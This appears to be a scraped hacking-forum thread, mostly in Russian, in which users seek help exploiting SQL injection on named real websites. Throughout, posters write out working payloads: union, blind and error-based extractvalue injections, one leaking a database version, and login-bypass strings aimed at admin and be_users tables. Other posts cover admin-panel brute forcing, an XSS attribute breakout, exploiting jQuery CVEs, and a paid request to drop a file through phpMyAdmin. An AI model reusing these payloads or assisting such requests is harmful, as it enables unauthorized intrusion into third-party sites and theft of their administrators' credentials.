Поиграть руками с логикой. Вероятно это и не скуля вообще, а нестандартное поведение которое и задетектил ваш софт приняв это за sql-injection
Помогите раскрутить слепую скул, sqlmap не берёт почему-то, как только не состовлял запрос... Code: https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160 Code: https://www.dsb.de/schiesssport/top-events/meisterschuetze-2020/ergebnisse/details?type=1397852&cHash=3e082de9a35102fcae326f83fda1ea21&tx_trdsbmeisterschuetze_ajax[group]=1&tx_trdsbmeisterschuetze_ajax[search]=a&no_cache=1&tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+union+select+111,222+--+
Тут только слепая tx_trdsbmeisterschuetze_ajax%5Bcid%5D=5160)+and+if((select+count(*)+from+information_schema.tables+limit+0,1)=307,1,2)=1+--+
Помогите, что можно сделать? вывод в коде Code: view-source:https://www.reiseland-brandenburg.de/poi/dahme'/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262 Code: SELECT * FROM api_poi_url_mapping WHERE api_id=dahme'-naturbadestellen-teupi
help to inject here "from admin" return=&username=sdsadssda%27+or+1+group+by+mid(user(),rand(0))having+avg(0)%23&password=dsadsada return=&username=sdsadssda%27+or+1+group+by+mid(user(),rand(0) from admin)having+avg(0)%23&password=dsadsada doesn't work
Немного извращенно, но работать будет /poi/extractvalue(1,concat(0x3a,(select@@version)))/naturbadestellen/teupitzer-see/?no_cache=1&cHash=1e4d4ebf75c72c85dabd94a7e10c384a&external_id=52262 Code: XPATH syntax error: ':5.5.62-0ubuntu0.14.04.1'</span>' (46 chars) we are need full url for understanding filters
help for sql injection Spoiler: sqli link https://optimal.az/TV-Audio-Foto-Video/Oyun-ve-Eylence?page=2&price=1%27group%20by%20mid(user()%20from%20floor(rand(0)*2))having%20avg(0)--%20- How to get table & column names ? Thanks for help !
Hi ! This is sqli ? Spoiler: sqli link https://www.petekamutner.am/covidNews.aspx?sid=src&nid=8025 Thank !
Как обойти where? Code: https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and/**/(extractvalue/*a*/(0,concat/**//*a*/(0,(select/**//*a*/(uid)from(be_users)where(admin=1)))))%23
Здравствуйте нужен совет. Сайт - БД User pass есть как найти там админа на сайте есть admin.php и форум, модера нашел тупо по нейму слил User_name . Куда копать где его искать ? Брутить? не все слил ибо слепая....
Сайт при нем форум в admin.php вбиваеш что либо не че не показывает за что зацепиться для брута либо я туплю уже. имеете виду в БД первый admin в таблице users? в панеле admin.php написанно не логин а ID Админа походу две базы на сайте msql и mssql такое возможно? сильно не пинать....
Есть input в <form>, могу выйти из атрибута инпута добавить onclick и сделать XSS(за пределы input не могу выйти), но форма настроена на авто .submit могу я анулировать отправку формы или без вариантов?
Что можно сделать с этой скулей? Code: https://www.aric.de/datenbanken/online_recherche/?no_cache=1&schlagwort_mit2=44&schlagwort_ohne=435&suchen=Suchen
есть слепая инъекция в influxdb вида history?name=alex'%20or%201=1-- Кто нибудь знает как в этой субд раскрутить слепую скулю или вывести хоть какие то нужные данные? help please
Приветствую всех. Нахожу постоянно уязвимости типа CVE-2020-11023 CVE-2020-11022 CVE-2015-9251 CVE-2019-11358 Уже не пинайте сильно новичка, а как воспользоваться этим видом уязвимостей. Вроде можно получить удалённый доступ к машине и вебсайту. Но в поиске ничего толкового найти не могу
Ни одна из уязвимостей не позволяет получить удалённого доступа (RCE). Все уязвимости касаются клиентских JS библиотек. Которые, в теории, при определённом стечении обстоятельств, позволят провести XSS атаку. Что позволит атаковать администратора для дальнейшего продвижения к цели.
Может кто-нибудь пролить файл через phpmyadmin 3.3.7 ? Нужна любая полезная информация, за вознаграждение
Подскажите реально ли что-то сделать в таком случае? Code: $ch = curl_init('http://site.com/page.php?file='.$_GET['file']);